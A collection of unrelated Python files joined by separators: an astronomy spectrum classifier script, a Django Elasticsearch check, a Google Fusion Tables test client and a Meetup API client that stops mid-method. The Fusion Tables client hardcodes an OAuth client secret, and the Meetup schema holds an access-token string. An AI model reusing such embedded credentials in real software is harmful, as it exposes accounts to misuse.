plt.savefig("output_data/plots/distribution_vanilla4_500_exps.png")
plt.close()
plt.figure()
g = sns.histplot(data=vanilla4_results, x="combined_value")
g.set(xlabel="Combined Value = 2A + B + C + 0.5D")
plt.savefig("output_data/plots/distribution_vanilla4_combined.png")
plt.close()
print("The best alignment:")
print(vanilla4_results.iloc[0]["custom_alignment"])
print("The worst alignment:")
print(vanilla4_results.iloc[-1]["custom_alignment"])
|
#!/usr/bin/env python
"""Apply the DESITrIP CNN classifier to observed spectra,
chosen by tile ID and date.
"""
from desispec.io import read_spectra, write_spectra
from desispec.spectra import Spectra
from desitarget.cmx.cmx_targetmask import cmx_mask
from desitrip.preproc import rebin_flux, rescale_flux
from astropy.io import fits
from astropy.table import Table, vstack, hstack
from glob import glob
from datetime import date
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import os
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from tensorflow import keras
p = ArgumentParser(description='DESITrIP data processing',
formatter_class=ArgumentDefaultsHelpFormatter)
p.add_argument('--tile', type=int, default=0,
help='Tile ID for processing.')
p.add_argument('--date', default=date.today().strftime('%Y%m%d'),
help='Date of observation [YYYYMMDD]')
p.add_argument('--tfmodel', default=None,
help='TensorFlow model HDF5 definition')
args = p.parse_args()
# Access redux folder.
redux='/global/project/projectdirs/desi/spectro/redux/daily/tiles'
prefix_in='/'.join([redux, '{:05d}'.format(args.tile), args.date])
if not os.path.isdir(prefix_in):
raise SystemExit('{} does not exist.'.format(prefix_in))
# Set up BGS target bit selection.
cmx_bgs_bits = '|'.join([_ for _ in cmx_mask.names() if 'BGS' in _])
# List zbest and coadd files.
zbfiles = sorted(glob('{}/zbest*.fits'.format(prefix_in)))
cafiles = sorted(glob('{}/coadd*.fits'.format(prefix_in)))
if args.tfmodel is not None:
classifier = keras.models.load_model(args.tfmodel)
# Loop through zbest and coadd files for each petal.
# Extract the fibermaps, ZBEST tables, and spectra.
# Keep only BGS targets passing basic event selection.
allzbest = None
allfmap = None
allwave = None
allflux = None
allivar = None
allmask = None
allres = None
for cafile, zbfile in zip(cafiles, zbfiles):
# Access data per petal.
zbest = Table.read(zbfile, 'ZBEST')
fibermap = Table.read(zbfile, 'FIBERMAP')
pspectra = read_spectra(cafile)
# Apply standard event selection.
isTGT = fibermap['OBJTYPE'] == 'TGT'
isGAL = zbest['SPECTYPE'] == 'GALAXY'
isBGS = fibermap['CMX_TARGET'] & cmx_mask.mask(cmx_bgs_bits) != 0
select = isTGT & isGAL & isBGS
# Accumulate spectrum data.
if allzbest is None:
allzbest = zbest[select]
allfmap = fibermap[select]
allwave = pspectra.wave['brz']
allflux = pspectra.flux['brz'][select]
allivar = pspectra.ivar['brz'][select]
allmask = pspectra.mask['brz'][select]
allres = pspectra.resolution_data['brz'][select]
else:
allzbest = vstack([allzbest, zbest[select]])
allfmap = vstack([allfmap, fibermap[select]])
allflux = np.vstack([allflux, pspectra.flux['brz'][select]])
allivar = np.vstack([allivar, pspectra.ivar['brz'][select]])
allmask = np.vstack([allmask, pspectra.mask['brz'][select]])
allres = np.vstack([allres, pspectra.resolution_data['brz'][select]])
# Apply the DESITrIP preprocessing to selected spectra.
rewave, reflux, reivar = rebin_flux(allwave, allflux, allivar, allzbest['Z'],
minwave=2500., maxwave=9500., nbins=150,
log=True, clip=True)
rsflux = rescale_flux(reflux)
# Run the classification.
if args.tfmodel is not None:
pred = classifier.predict(rsflux)
# Create output: selected target spectra.
selected_spectra = Spectra(bands=['brz'],
wave={'brz' : allwave},
flux={'brz' : allflux},
ivar={'brz' : allivar},
mask={'brz' : allmask},
resolution_data={'brz' : allres},
fibermap=allfmap)
write_spectra('selected-{}-{}.fits'.format(args.tile, args.date), selected_spectra)
# Append preprocess spectra to output.
hx = fits.HDUList()
hdu_rewave = fits.PrimaryHDU(rewave)
hdu_rewave.header['EXTNAME'] = 'REWAVE'
hdu_rewave.header['BUNIT'] = 'Angstrom'
hdu_rewave.header['AIRORVAC'] = ('vac', 'Vacuum wavelengths')
hx.append(hdu_rewave)
hdu_reflux = fits.ImageHDU(reflux)
hdu_reflux.header['EXTNAME'] = 'REFLUX'
hx.append(hdu_reflux)
hdu_rsflux = fits.ImageHDU(rsflux)
hdu_rsflux.header['EXTNAME'] = 'RSFLUX'
hx.append(hdu_rsflux)
hdu_classify = fits.ImageHDU(pred)
hdu_classify.header['EXTNAME'] = 'OBJCLASS'
hx.append(hdu_classify)
hx.append(fits.BinTableHDU(allzbest))
hx.writeto('reduced-{}-{}.fits'.format(args.tile, args.date), overwrite=True)
|
from django.core.management.base import BaseCommand
from elasticsearch import Elasticsearch
from create_lesson_plan.models import IndexDocument
class Command(BaseCommand):
def get_body(self, pk):
query_body ={
"query": {
"bool": {
"must": [
{"match": {
"pk": pk
}}
]
}
},
"_source": ["link", "pk"]
}
return query_body
def handle(self, *args, **options):
all_index = IndexDocument.objects.all()
es = Elasticsearch()
counter = 0
for each in all_index.iterator():
query_body = self.get_body(each.pk)
results = es.search(index="offline_content", body=query_body)
if(len(results["hits"]["hits"]) > 0):
res = results["hits"]["hits"][0]["_source"]
if(res["link"] != each.link):
counter += 1
print(counter)
|
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Modified generated client library for fusiontables version v1.
This is a hand-customized and pruned version of the fusiontables v1
client, designed for use in testing.
"""
from apitools.base.py import base_api
from apitools.base.py.testing.testclient import fusiontables_v1_messages
class FusiontablesV1(base_api.BaseApiClient):
"""Generated client library for service fusiontables version v1."""
MESSAGES_MODULE = fusiontables_v1_messages
_PACKAGE = u'fusiontables'
_SCOPES = [u'https://www.googleapis.com/auth/fusiontables',
u'https://www.googleapis.com/auth/fusiontables.readonly']
_VERSION = u'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = ''
_CLIENT_CLASS_NAME = u'FusiontablesV1'
_URL_VERSION = u'v1'
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new fusiontables handle."""
url = url or u'https://www.googleapis.com/fusiontables/v1/'
super(FusiontablesV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.column = self.ColumnService(self)
self.columnalternate = self.ColumnAlternateService(self)
class ColumnService(base_api.BaseApiService):
"""Service class for the column resource."""
_NAME = u'column'
def __init__(self, client):
super(FusiontablesV1.ColumnService, self).__init__(client)
self._method_configs = {
'List': base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'fusiontables.column.list',
ordered_params=[u'tableId'],
path_params=[u'tableId'],
query_params=[u'maxResults', u'pageToken'],
relative_path=u'tables/{tableId}/columns',
request_field='',
request_type_name=u'FusiontablesColumnListRequest',
response_type_name=u'ColumnList',
supports_download=False,
),
}
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Retrieves a list of columns.
Args:
request: (FusiontablesColumnListRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ColumnList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
class ColumnAlternateService(base_api.BaseApiService):
"""Service class for the column resource."""
_NAME = u'columnalternate'
def __init__(self, client):
super(FusiontablesV1.ColumnAlternateService, self).__init__(client)
self._method_configs = {
'List': base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'fusiontables.column.listalternate',
ordered_params=[u'tableId'],
path_params=[u'tableId'],
query_params=[u'maxResults', u'pageToken'],
relative_path=u'tables/{tableId}/columns',
request_field='',
request_type_name=(
u'FusiontablesColumnListAlternateRequest'),
response_type_name=u'ColumnListAlternate',
supports_download=False,
),
}
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Retrieves a list of columns.
Args:
request: (FusiontablesColumnListRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ColumnList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
|
__author__ = 'rcj1492'
__created__ = '2015.06'
class meetupHandler(object):
''' handles responses from meetup api and usage data'''
_class_fields = {
'schema': {
'rate_limits': [
{'requests': 30, 'period': 10}
]
}
}
def __init__(self, usage_client=None):
''' initialization method for meetup handler class
:param usage_client: callable that records usage data
'''
# construct class field model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# construct initial methods
self.rate_limits = self.fields.schema['rate_limits']
self.usage_client = usage_client
def handle(self, response):
# construct default response details
details = {
'method': response.request.method,
'code': response.status_code,
'url': response.url,
'error': '',
'json': None,
'headers': response.headers
}
# rate limit headers:
# https://www.meetup.com/meetup_api/docs/#limits
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# handle different codes
if details['code'] == 200 or details['code'] == 201 or details['code'] == 202:
details['json'] = response.json()
else:
details['error'] = response.content.decode()
return details
class meetupRegister(object):
''' currently must be done manually '''
# https://secure.meetup.com/meetup_api/oauth_consumers/
def __init__(self, app_settings):
pass
def setup(self):
return self
def update(self):
return self
class meetupClient(object):
''' a class of methods for managing user events, groups and profile on Meetup API '''
# use labpack.authentication.oauth2.oauth2Client to obtain access token
_class_fields = {
'schema': {
'api_endpoint': 'https://api.meetup.com',
'access_token': '1350d78219f4dc9ded18c7fbda86a19e',
'service_scope': ['ageless'],
'requests_handler': 'labpack.handlers.requests.handle_requests',
'usage_client': 'labpack.storage.appdata.appdataClient.__init__',
'member_id': 12345678,
'group_url': 'myfavoritegroup',
'group_id': 23456789,
'event_id': 23454321,
'venue_id': 123456,
'max_results': 4,
'radius': 10.0,
'topics': [ 123 ],
'categories': [ 12 ],
'zip_code': '94203',
'city_name': 'Sacramento',
'country_code': 'US',
'longitude': 12.345678,
'latitude': 12.345679,
'text': 'favorite group',
'location': 'state capital building',
'membership_answers': [
{
'question_id': 1234567,
'answer_text': 'my name'
}
],
'exit_comment': 'better deal',
'attendance_answers': [
{
'question_id': 1234567,
'answer_text': 'my name'
}
],
'additional_guests': 0,
'payment_service': '',
'payment_code': ''
},
'components': {
'.service_scope': {
'unique_values': True
},
'.service_scope[0]': {
'discrete_values': ['ageless', 'basic', 'event_management', 'group_edit', 'group_content', 'group_join', 'profile_edit', 'reporting', 'rsvp']
},
'.topics[0]': {
'integer_data': True
},
'.categories[0]': {
'integer_data': True
},
'.max_results': {
'integer_data': True
},
'.member_id': {
'integer_data': True
},
'.event_id': {
'integer_data': True
},
'.group_id': {
'integer_data': True
},
'.venue_id': {
'integer_data': True
},
'.radius': {
'min_value': 0.0,
'max_value': 100.0
},
'.latitude': {
'min_value': -90.0,
'max_value': 90.0
},
'.longitude': {
'min_value': -90.0,
'max_value': 90.0
},
'.zip_code': {
'max_length': 5,
'min_length': 5,
'must_contain': [ '\\d{5}' ]
},
'.country_code': {
'max_length': 2,
'min_length': 2,
'must_contain': [ '[A-Z]{2}' ]
},
'.membership_answers[0].question_id': {
'integer_data': True
},
'.attendance_answers[0].question_id': {
'integer_data': True
},
'.additional_guests': {
'integer_data': True,
'min_value': 0
}
}
}
_class_objects = {
'profile_brief': {
'schema': {
'bio': '',
'city': '',
'country': '',
'id': '',
'joined': '',
'lang': '',
'lat': '',
'link': '',
'lon': '',
'name': '',
'photo_url': '',
'state': '',
'visited': '',
'zip': ''
}
},
'profile': {
'schema': {
'bio': '',
'birthday': {
'day': 0,
'month': 0,
'year': 0
},
'city': '',
'country': '',
'gender': '',
'group_profile': {},
'id': 0,
'joined': 0,
'last_event': {},
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'messaging_pref': '',
'name': '',
'next_event': {},
'other_services': {
'facebook': {'identifier': '', 'url': ''},
'linkedin': {'identifier': '', 'url': ''},
'twitter': {'identifier': '', 'url': ''}
},
'photo': {},
'privacy': {
'bio': '',
'groups': '',
'topics': '',
'facebook': ''
},
'self': {},
'state': '',
'stats': {
'groups': 0,
'rsvps': 0,
'topics': 0
},
'status': ''
},
'components': {
'.': {
'extra_fields': True
},
'.birthday.day': {
'integer_data': True
},
'.birthday.month': {
'integer_data': True
},
'.birthday.year': {
'integer_data': True
},
'.id': {
'integer_data': True
},
'.joined': {
'integer_data': True
},
'.other_services': {
'extra_fields': True
},
'.other_services.facebook': {
'extra_fields': True
},
'.other_services.twitter': {
'extra_fields': True
},
'.other_services.linkedin': {
'extra_fields': True
},
'.stats.groups': {
'integer_data': True
},
'.stats.rsvps': {
'integer_data': True
},
'.stats.topics': {
'integer_data': True
}
}
},
'topic': {
'schema': {
'urlkey': 'diningout',
'lang': 'en_US',
'id': 713,
'name': 'Dining Out'
},
'components': {
'.id': {
'integer_data': True
}
}
},
'self': {
'schema': {
'actions': [''],
'common': {
'groups': [{}]
},
'blocks': False,
'friends': False
}
},
'group_profile': {
'schema': {
'created': 0,
'answers': [ {
'answer': '',
'question': '',
'question_id': 0
}],
'group': {},
'role': '',
'status': '',
'updated': 0,
'visited': 0
},
'components': {
'.': {
'extra_fields': True
},
'.created': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.visited': {
'integer_data': True
}
}
},
'event': {
'schema': {
'id': '123456789',
'name': 'My Favorite Event',
'created': 1234567890000,
'updated': 1234567890000,
'visibility': 'public',
'status': 'upcoming',
'time': 1234567890000,
'utc_offset': -28800000,
'duration': 11700000,
'fee': {
'accepts': 'paypal',
'required': False,
'label': 'price',
'currency': 'USD',
'description': 'per person',
'amount': 5.0
},
'rsvp_rules': {
'close_time': 1234567890000,
'closed': False,
'guest_limit': 0,
'open_time': 1234567890000,
'refund_policy': {
'days': 3,
'notes': '',
'policies': [ '' ]
},
'waitlisting': 'auto'
},
'self': {
'actions': ['upload_photo'],
'rsvp': {
'answers': [
{
'answer': '',
'question': "do you like chocolate?",
'question_id': 12345678,
'updated': 1234567890000
}
],
'guests': 0,
'response': 'yes'
}
},
'survey_questions': [
{
'id': 12345678,
'question': 'tell me something i want to know'
}
],
'rsvp_limit': 200,
'yes_rsvp_count': 200,
'waitlist_count': 123,
'rsvpable': True,
'rsvpable_after_join': False,
'description': '<p>A long description</p>',
'comment_count': 1,
'how_to_find_us': 'open the door',
'group': {
'created': 1321563802000,
'id': 2829432,
'join_mode': 'approval',
'lat': 40.7599983215332,
'lon': -73.97000122070312,
'name': 'Data Driven NYC (a FirstMark Event)',
'urlname': 'DataDrivenNYC',
'who': 'Members'
},
'venue': {
'address_1': '731 Lexington Av. 7th Floor',
'city': 'New York',
'country': 'us',
'id': 5405082,
'lat': 40.761932373046875,
'localized_country_name': 'USA',
'lon': -73.96805572509766,
'name': 'Bloomberg LP',
'repinned': False,
'state': 'NY',
'zip': '10022'
},
'event_hosts': [ {
'id': 2369792,
'name': 'Matt Turck',
'photo': {
'base_url': 'http://photos4.meetupstatic.com',
'highres_link': 'http://photos2.meetupstatic.com/photos/member/1/9/2/4/highres_255546436.jpeg',
'id': 255546436,
'photo_link': 'http://photos2.meetupstatic.com/photos/member/1/9/2/4/member_255546436.jpeg',
'thumb_link': 'http://photos4.meetupstatic.com/photos/member/1/9/2/4/thumb_255546436.jpeg',
'type': 'member'
}
} ],
'short_link': 'http://meetu.ps/e/df6Ju/GlGy/i',
'link': 'https://www.meetup.com/mygroup/events/123456789/'
},
'components': {
'.created': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.time': {
'integer_data': True
},
'.utc_offset': {
'integer_data': True
},
'.duration': {
'integer_data': True
},
'.rsvp_limit': {
'integer_data': True
},
'.yes_rsvp_count': {
'integer_data': True
},
'.waitlist_count': {
'integer_data': True
},
'.comment_count': {
'integer_data': True
},
'.fee': {
'extra_fields': True
},
'.rsvp_rules': {
'extra_fields': True
},
'.rsvp_rules.open_time': {
'integer_data': True
},
'.rsvp_rules.close_time': {
'integer_data': True
},
'.rsvp_rules.guest_limit': {
'integer_data': True
},
'.rsvp_rules.refund_policy.days': {
'integer_data': True
},
'.rsvp_rules.refund_policy': {
'extra_fields': True
},
'.self': {
'extra_fields': True
},
'.self.rsvp': {
'extra_fields': True
},
'.self.rsvp.answers[0]': {
'extra_fields': True
},
'.self.rsvp.answers[0].question_id': {
'integer_data': True
},
'.self.rsvp.answers[0].updated': {
'integer_data': True
},
'.self.rsvp.guests': {
'integer_data': True
},
'.survey_questions[0]': {
'extra_fields': True
},
'.survey_questions[0].id': {
'integer_data': True
},
'.group': {
'extra_fields': True
},
'.venue': {
'extra_fields': True
},
'.event_hosts[0]': {
'extra_fields': True
},
'.event_hosts[0].id': {
'integer_data': True
},
'.event_hosts[0].photo.id': {
'integer_data': True
},
'.event_hosts[0].photo': {
'extra_fields': True
}
}
},
'event_group': {
'schema': {
'created': 0,
'id': 0,
'join_mode': '',
'lat': 0.0,
'lon': 0.0,
'name': '',
'urlname': '',
'who': ''
},
'components': {
'.id': {
'integer_data': True
},
'.created': {
'integer_data': True
}
}
},
'group_brief': {
'schema': {
'group_photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'id': 0,
'join_mode': '',
'key_photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'members': 0,
'name': '',
'urlname': '',
'who': ''
},
'components': {
'.id': {
'integer_data': True
},
'.group_photo': {
'extra_fields': True
},
'.group_photo.id': {
'integer_data': True
},
'.key_photo': {
'extra_fields': True
},
'.key_photo.id': {
'integer_data': True
},
'.members': {
'integer_data': True
}
}
},
'group': {
'schema': {
'category': {
'id': 0,
'name': '',
'shortname': '',
'sort_name': ''
},
'city': '',
'country': '',
'created': 0,
'description': '',
'group_photo': {},
'id': 0,
'join_info': {
'photo_req': False,
'questions': [ {
'id': 0,
'question': ''
} ],
'questions_req': False
},
'join_mode': '',
'key_photo': {},
'last_event': {},
'lat': 0.0,
'link': '',
'localized_country_name': '',
'lon': 0.0,
'members': 0,
'membership_dues': {
'currency': '',
'fee': 0.0,
'fee_desc': '',
'methods': {
'amazon_payment': False,
'credit_card': False,
'other': False,
'paypal': False
},
'reasons': [ '' ],
'reasons_other': '',
'refund_policy': {},
'required': False,
'required_to': '',
'self_payment_required': False,
'trial_days': 0
},
'name': '',
'next_event': {},
'organizer': {
'bio': '',
'id': 0,
'name': '',
'photo': {}
},
'photos': [ {} ],
'score': 0.0,
'state': '',
'timezone': '',
'urlname': '',
'visibility': '',
'who': ''
},
'components': {
'.': {
'extra_fields': True
},
'.category.id': {
'integer_data': True
},
'.created': {
'integer_data': True
},
'.id': {
'integer_data': True
},
'.members': {
'integer_data': True
},
'.membership_dues.trial_days': {
'integer_data': True
},
'.organizer.id': {
'integer_data': True
},
'.organizer': {
'extra_fields': True
},
}
},
'event_brief': {
'schema': {
'id': '',
'name': '',
'time': 0,
'utc_offset': 0,
'yes_rsvp_count': 0
},
'components': {
'.': {
'extra_fields': True
},
'.time': {
'integer_data': True
},
'.utc_offset': {
'integer_data': True
},
'.yes_rsvp_count': {
'integer_data': True
}
}
},
'photo': {
'schema': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'components': {
'.': {
'extra_fields': True
},
'.id': {
'integer_data': True
}
}
},
'venue': {
'schema': {
'address_1': '',
'address_2': '',
'address_3': '',
'city': '',
'country': '',
'distance': 0,
'email': '',
'fax': '',
'id': 0,
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'name': '',
'phone': '',
'rating': 0,
'rating_count': 0,
'repinned': False,
'state': '',
'visibility': 'public',
'zip': ''
},
'components': {
'.visibility': {
'default_value': 'public'
},
'.id': {
'integer_data': True
},
'.distance': {
'integer_data': True
},
'.rating': {
'integer_data': True
},
'.rating_count': {
'integer_data': True
}
}
},
'attendee': {
'schema': {
'created': 0,
'event': {},
'group': {},
'guests': 0,
'member': {'bio': '',
'event_context': {'host': False},
'id': 0,
'name': '',
'photo': {
'base_url': '',
'highres_link': '',
'id': 0,
'photo_link': '',
'thumb_link': '',
'type': ''
},
'role': '',
'title': ''
},
'response': '',
'updated': 0,
'venue': {}
},
'components': {
'.': {
'extra_fields': True
},
'.member': {
'extra_fields': True
},
'.member.event_context': {
'extra_fields': True
},
'.created': {
'integer_data': True
},
'.member.id': {
'integer_data': True
},
'.updated': {
'integer_data': True
},
'.guests': {
'integer_data': True
}
}
},
'location': {
'schema':{
'city': '',
'country': '',
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'name_string': '',
'state': '',
'zip': ''
}
}
}
def __init__(self, access_token, service_scope, usage_client=None, requests_handler=None):
''' initialization method for meetup client class
:param access_token: string with access token for user provided by meetup oauth
:param service_scope: dictionary with service type permissions
:param usage_client: [optional] callable that records usage data
:param requests_handler: [optional] callable that handles requests errors
'''
title = '%s.__init__' % self.__class__.__name__
# construct class field model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# construct class object models
object_models = {}
for key, value in self._class_objects.items():
object_models[key] = jsonModel(value)
from labpack.compilers.objects import _method_constructor
self.objects = _method_constructor(object_models)
# validate inputs
input_fields = {
'access_token': access_token,
'service_scope': service_scope
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct class properties
self.access_token = access_token
self.service_scope = service_scope
self.endpoint = self.fields.schema['api_endpoint']
# construct method handlers
self.requests_handler = requests_handler
self.service_handler = meetupHandler(usage_client)
def _get_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.get(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'GET'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _post_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.post(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'POST'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _delete_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.delete(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'DELETE'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _patch_request(self, url, headers=None, params=None):
import requests
# construct request kwargs
request_kwargs = {
'url': url,
'headers': {'Authorization': 'Bearer %s' % self.access_token},
'params': {}
}
if headers:
request_kwargs['headers'].update(headers)
if params:
request_kwargs['params'].update(params)
# send request
try:
response = requests.patch(**request_kwargs)
except Exception:
if self.requests_handler:
request_kwargs['method'] = 'PATCH'
request_object = requests.Request(**request_kwargs)
return self.requests_handler(request_object)
else:
raise
# handle response
response_details = self.service_handler.handle(response)
return response_details
def _reconstruct_event(self, event_details):
# handle self key exception for jsonmodel.ingest class method
self_details = {}
self_schema = {}
if 'self' in event_details.keys():
self_details = event_details['self']
self_schema = self.objects.event.schema['self']
del event_details['self']
# ingest top level object
event_details = self.objects.event.ingest(**event_details)
# ingest lower level objects
event_details['self'] = self.objects.event._ingest_dict(self_details, self_schema, '.self')
event_details['venue'] = self.objects.venue.ingest(**event_details['venue'])
event_details['group'] = self.objects.event_group.ingest(**event_details['group'])
return event_details
def _reconstruct_group(self, group_details):
# ingest top level object
group_details = self.objects.group.ingest(**group_details)
# ingest lower level objects
group_details['last_event'] = self.objects.event_brief.ingest(**group_details['last_event'])
group_details['next_event'] = self.objects.event_brief.ingest(**group_details['next_event'])
group_details['group_photo'] = self.objects.photo.ingest(**group_details['group_photo'])
group_details['key_photo'] = self.objects.photo.ingest(**group_details['key_photo'])
group_details['organizer']['photo'] = self.objects.photo.ingest(**group_details['organizer']['photo'])
for photo in group_details['photos']:
photo = self.objects.photo.ingest(**photo)
return group_details
def _reconstruct_member(self, member_details):
# remove self key from details
self_details = {}
if 'self' in member_details.keys():
self_details = member_details['self']
del member_details['self']
# ingest top level object
member_details = self.objects.profile.ingest(**member_details)
# re-integrate self key
member_details['self'] = self.objects.self.ingest(**self_details)
common_groups = []
for group in member_details['self']['common']['groups']:
common_groups.append(self.objects.group_brief.ingest(**group))
member_details['self']['common']['groups'] = common_groups
# ingest lower level objects
member_details['group_profile'] = self.objects.group_profile.ingest(**member_details['group_profile'])
group_details = member_details['group_profile']['group']
member_details['group_profile']['group'] = self.objects.group_brief.ingest(**group_details)
member_details['photo'] = self.objects.photo.ingest(**member_details['photo'])
# ingest last and next event objects
self_details = {}
if 'self' in member_details['last_event'].keys():
self_details = member_details['last_event']['self']
del member_details['last_event']['self']
member_details['last_event'] = self.objects.event_brief.ingest(**member_details['last_event'])
member_details['last_event']['self'] = self.objects.self.ingest(**self_details)
self_details = {}
if 'self' in member_details['next_event'].keys():
self_details = member_details['next_event']['self']
del member_details['next_event']['self']
member_details['next_event'] = self.objects.event_brief.ingest(**member_details['next_event'])
member_details['next_event']['self'] = self.objects.self.ingest(**self_details)
return member_details
def _reconstruct_attendee(self, attendee_details):
# ingest top level object
attendee_details = self.objects.attendee.ingest(**attendee_details)
# ingest lower level objects
attendee_details['group'] = self.objects.group_brief.ingest(**attendee_details['group'])
attendee_details['event'] = self.objects.event_brief.ingest(**attendee_details['event'])
attendee_details['venue'] = self.objects.venue.ingest(**attendee_details['venue'])
photo_details = attendee_details['member']['photo']
attendee_details['member']['photo'] = self.objects.photo.ingest(**photo_details)
return attendee_details
def get_member_brief(self, member_id=0):
''' a method to retrieve member profile info
:param member_id: [optional] integer with member id from member profile
:return: dictionary with member profile inside [json] key
member_profile = self.objects.profile_brief.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.get_member_brief' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/' % self.endpoint
params = {
'member_id': 'self'
}
if member_id:
params['member_id'] = member_id
# send request
response_details = self._get_request(url, params=params)
# construct method output dictionary
profile_details = {
'json': {}
}
for key, value in response_details.items():
if not key == 'json':
profile_details[key] = value
# parse response
if response_details['json']:
if 'results' in response_details['json'].keys():
if response_details['json']['results']:
details = response_details['json']['results'][0]
for key, value in details.items():
if key != 'topics':
profile_details['json'][key] = value
profile_details['json'] = self.objects.profile_brief.ingest(**profile_details['json'])
return profile_details
def get_member_profile(self, member_id):
''' a method to retrieve member profile details
:param member_id: integer with member id from member profile
:return: dictionary with member profile details inside [json] key
profile_details = self.objects.profile.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.get_member_profile' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats'
}
# send requests
profile_details = self._get_request(url, params=params)
# construct method output
if profile_details['json']:
profile_details['json'] = self._reconstruct_member(profile_details['json'])
return profile_details
def update_member_profile(self, brief_details, profile_details):
''' a method to update user profile details on meetup
:param brief_details: dictionary with member brief details with updated values
:param profile_details: dictionary with member profile details with updated values
:return: dictionary with partial profile details inside [json] key
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.update_member_profile' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
brief_details = self.objects.profile_brief.validate(brief_details)
profile_details = self.objects.profile.validate(profile_details)
# construct request fields
url = '%s/members/%s' % (self.endpoint, str(profile_details['id']))
params = {
'bio': profile_details['bio'],
'bio_privacy': profile_details['privacy']['bio'],
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats',
'gender': profile_details['gender'],
'groups_privacy': profile_details['privacy']['groups'],
'lang': brief_details['lang'].replace('_', '-'),
'lat': str(profile_details['lat']),
'lon': str(profile_details['lon']),
'messaging_pref': profile_details['messaging_pref'],
'name': profile_details['name'],
'photo_id': profile_details['photo']['id'],
'sync_photo': True,
'topics_privacy': profile_details['privacy']['topics'],
'zip': brief_details['zip']
}
if profile_details['privacy']['facebook']:
params['facebook_privacy'] = profile_details['privacy']['facebook']
birthday_value = False
for key, value in profile_details['birthday'].items():
if value:
birthday_value = True
break
if not birthday_value:
params['birthday'] = '-1'
else:
